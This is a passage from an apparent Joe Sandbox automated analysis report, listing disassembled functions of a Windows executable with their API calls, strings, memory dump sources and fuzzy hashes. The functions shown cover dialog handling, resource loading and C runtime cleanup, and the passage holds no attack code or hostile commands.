                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                    • Opcode ID: 0160d82d91c476cd48b1fd942584e4a5ff6784386b43a80e4869701143c1e0fe
                                                                                                                    • Instruction ID: 6d30bf2220706c4defcdb3afd95d9c271c42d4a1744262c2dac7c5eabb4eabe7
                                                                                                                    • Opcode Fuzzy Hash: 0160d82d91c476cd48b1fd942584e4a5ff6784386b43a80e4869701143c1e0fe
                                                                                                                    • Instruction Fuzzy Hash: A101D6675047117596306B758C4AD6BABDCEE91771F40680AF746F7082EB24D854C2B1
                                                                                                                    Function 00E4B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E4B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E4B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 445417207-3234807970
                                                                                                                    • Opcode ID: 923393859d2e0242c2b9f855cc8dee460cfc9ba0c155f5f405b9262ef5702ce2
                                                                                                                    • Instruction ID: 8aca8c9e3c30b085b2a25e6d6401a94198b4339704f4f5591d6227b8b055a565
                                                                                                                    • Opcode Fuzzy Hash: 923393859d2e0242c2b9f855cc8dee460cfc9ba0c155f5f405b9262ef5702ce2
                                                                                                                    • Instruction Fuzzy Hash: 74110432940118BADB21AE75AC4DFFF3BBCEF09744F001021FA45B2090C7E0DA059761
                                                                                                                    Function 00E4B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00E4B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4B767
                                                                                                                      • Part of subcall function 00E4A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6D5
                                                                                                                      • Part of subcall function 00E4A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6EC
                                                                                                                      • Part of subcall function 00E4A6C2: LoadResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A703
                                                                                                                      • Part of subcall function 00E4A6C2: LockResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A712
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E4B73D,00000066), ref: 00E4A72D
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalLock.KERNEL32(00000000), ref: 00E4A73E
                                                                                                                      • Part of subcall function 00E4A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E4A762
                                                                                                                      • Part of subcall function 00E4A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E4A7A7
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00E4A7C6
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalFree.KERNEL32(00000000), ref: 00E4A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: 1c5741a90cfad4255019e416f47a87dce469ab987aa1562b1cc47e6c926184b3
                                                                                                                    • Instruction ID: e68d82e084d9ecc0e55938884a0b9c04b7723dd550bf30680a505aeb04984ddb
                                                                                                                    • Opcode Fuzzy Hash: 1c5741a90cfad4255019e416f47a87dce469ab987aa1562b1cc47e6c926184b3
                                                                                                                    • Instruction Fuzzy Hash: C601F9365402016BC7117775BC0DA7F7AB99FC0766F091223F900B7291DF75CD094261
                                                                                                                    Function 00E4D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E4D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E4D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00E4D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: d0076caf2ac13487ee0e56f57243f38dfd6be80b1eabbf6eb4dc5dcf153033b3
                                                                                                                    • Instruction ID: 03fc0a9a6306e238adbeed9da0f0e7110ec8d61c12f4cc18dfd2d3d81322d0a3
                                                                                                                    • Opcode Fuzzy Hash: d0076caf2ac13487ee0e56f57243f38dfd6be80b1eabbf6eb4dc5dcf153033b3
                                                                                                                    • Instruction Fuzzy Hash: E3012833689310BED2114F76BD09F577B6CEB9AB05F120052F305B20D0C6A29A188779
                                                                                                                    Function 00E57E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E57E24,00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002), ref: 00E57E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E57EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E57E24,00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002), ref: 00E57EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 4b633ae6c553cc38fb85ad828477a159b1255d8681ea777b7f6df4b8e74fcd3c
                                                                                                                    • Instruction ID: 5c4fa04acb8776d386394f87dccf8d0e03058b28374ef2ec7fbcd8da310cc665
                                                                                                                    • Opcode Fuzzy Hash: 4b633ae6c553cc38fb85ad828477a159b1255d8681ea777b7f6df4b8e74fcd3c
                                                                                                                    • Instruction Fuzzy Hash: CEF04431944208BFCB119BA5FC09B9FBFB9EB44796F0041A9F815B2260DF709E58CA90
                                                                                                                    Function 00E3F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                      • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E3F2E4
                                                                                                                    • GetProcAddress.KERNEL32(00E781C8,CryptUnprotectMemory), ref: 00E3F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: fe5afcd3e0b940fc90819bee661bb45b66c71bb65b1368aa17778982f7a21fd3
                                                                                                                    • Instruction ID: 7d82500f5a6f16806ca95be2ba24d7d619a836b72ab406f11a55152a115b7a05
                                                                                                                    • Opcode Fuzzy Hash: fe5afcd3e0b940fc90819bee661bb45b66c71bb65b1368aa17778982f7a21fd3
                                                                                                                    • Instruction Fuzzy Hash: 81E08670D547429EC7209F75B84DB027ED56F04744F14A86DF0DAB3690DAB4D544CB50
                                                                                                                    Function 00E52BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: 5a4ea34952661846a9e34450a613e29b48f53daf17bd8723554f7ce0f23bd360
                                                                                                                    • Instruction ID: 02edf12102c1a3365c411969138ec00d30ed0bdd6ea1dd98c327f0aa84f0c8bb
                                                                                                                    • Opcode Fuzzy Hash: 5a4ea34952661846a9e34450a613e29b48f53daf17bd8723554f7ce0f23bd360
                                                                                                                    • Instruction Fuzzy Hash: CB510472600202AFDB298F14D845BAAB3B4FF52306F245C2DEE05772A2E731ED48D790
                                                                                                                    Function 00E5BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00E5BF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BF5C
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5BF82
                                                                                                                    • _free.LIBCMT ref: 00E5BF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5BFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: 1360c81e2abee8024d7e2f83167f9112095c5e031f3f770b7238396a62d299b8
                                                                                                                    • Instruction ID: 74b6854efce80f50f0c6c62ef4fae05c2dddbcdae4e908c1deffdbc2fcaf429d
                                                                                                                    • Opcode Fuzzy Hash: 1360c81e2abee8024d7e2f83167f9112095c5e031f3f770b7238396a62d299b8
                                                                                                                    • Instruction Fuzzy Hash: 170184727066157F232116776C4DCBB6A6EDEC3BA63141929FD04F2141EF608D0995B0
                                                                                                                    Function 00E59869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,00E591AD,00E5B188,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5986E
                                                                                                                    • _free.LIBCMT ref: 00E598A3
                                                                                                                    • _free.LIBCMT ref: 00E598CA
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E598D7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E598E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: bbe73972c7e2e6fed8852c50ba3ceceebbb5d3e94f8536a2734a875e4369ef69
                                                                                                                    • Instruction ID: e7a03ab22f981622828c3e3d95a2c21d87ae7a3dcdc400dd88f706659a554d2e
                                                                                                                    • Opcode Fuzzy Hash: bbe73972c7e2e6fed8852c50ba3ceceebbb5d3e94f8536a2734a875e4369ef69
                                                                                                                    • Instruction Fuzzy Hash: CA012136104701ABC21A23356C8599B26AEDBD23B77242935FD05B2293EFA08C0D4220
                                                                                                                    Function 00E40EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E411CF: ResetEvent.KERNEL32(?), ref: 00E411E1
                                                                                                                      • Part of subcall function 00E411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E411F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E40F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00E40F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00E40F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E40F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E40F6C
                                                                                                                      • Part of subcall function 00E40FE4: WaitForSingleObject.KERNEL32(?,000000FF,00E41206,?), ref: 00E40FEA
                                                                                                                      • Part of subcall function 00E40FE4: GetLastError.KERNEL32(?), ref: 00E40FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: ace5d4849ebd25de6a9c8171e576a0fa7f0a62ec8fce32c78dc667a1b7436991
                                                                                                                    • Instruction ID: b001f437897353f267e1b6e7ff7a90686c5a53bf9988f477277522ec58516d3d
                                                                                                                    • Opcode Fuzzy Hash: ace5d4849ebd25de6a9c8171e576a0fa7f0a62ec8fce32c78dc667a1b7436991
                                                                                                                    • Instruction Fuzzy Hash: F9015271500744EFC7629B65EC88BC6BBA9FB08750F000929F26B62161C7B57A58CB50
                                                                                                                    Function 00E5C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E5C817
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E5C829
                                                                                                                    • _free.LIBCMT ref: 00E5C83B
                                                                                                                    • _free.LIBCMT ref: 00E5C84D
                                                                                                                    • _free.LIBCMT ref: 00E5C85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: b63b7f36c073b72b410ea86d44e0cf8e726772bbc4fc461b10ba5d3017f68229
                                                                                                                    • Instruction ID: bcfe5bd9b79f192ce54fd0245a14b1ce3f256bb0e201807c7b98f558b6a0443a
                                                                                                                    • Opcode Fuzzy Hash: b63b7f36c073b72b410ea86d44e0cf8e726772bbc4fc461b10ba5d3017f68229
                                                                                                                    • Instruction Fuzzy Hash: ECF0FF32504204AF8624DB69F585C1773FDAB1075A7643C19FA08F7692CAB1FC888B54
                                                                                                                    Function 00E41FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E41FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00E41FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00E42006
                                                                                                                    • _wcslen.LIBCMT ref: 00E42014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E3B371,?,?,00000000,?,?,?), ref: 00E4202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    • Opcode ID: 1e0a263dfe72872724a78c9c299c1e447fc4bfe54ddc66ff03d31245fea769ef
                                                                                                                    • Instruction ID: e1a30bd76701684172ac870080270b14ea7966b62b3034d1f60eba39cb3f0ef0
                                                                                                                    • Opcode Fuzzy Hash: 1e0a263dfe72872724a78c9c299c1e447fc4bfe54ddc66ff03d31245fea769ef
                                                                                                                    • Instruction Fuzzy Hash: F0F06232408114BFCF221FA1EC09DCA7FA6DB407A1B119409FA156F062CF729A65D690
                                                                                                                    Function 00E415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
